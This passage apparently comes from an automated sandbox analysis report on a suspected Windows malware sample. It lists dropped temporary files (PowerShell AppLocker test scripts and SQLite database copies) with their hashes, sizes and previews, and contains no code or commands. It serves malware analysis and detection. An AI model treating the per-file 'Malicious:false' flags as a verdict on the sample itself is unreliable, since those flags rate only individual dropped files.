                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvq4hca0.xg0.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enyuk2dz.u5d.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i33hyvbn.can.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nlsevo1o.ogg.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_peger2w2.fer.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1qsnw13.na0.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\tmp100C.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp102C.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp102D.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp19D7.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.690299109915258
                      Encrypted:false
                      SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                      MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                      SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                      SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                      SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                      Malicious:false
                      Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                      C:\Users\user\AppData\Local\Temp\tmp2052.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp35F9.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp360A.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp361A.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp363B.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp363C.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp365C.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp365D.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp366E.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp366F.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp472C.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp472D.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp474E.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp475E.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp478E.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp478F.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
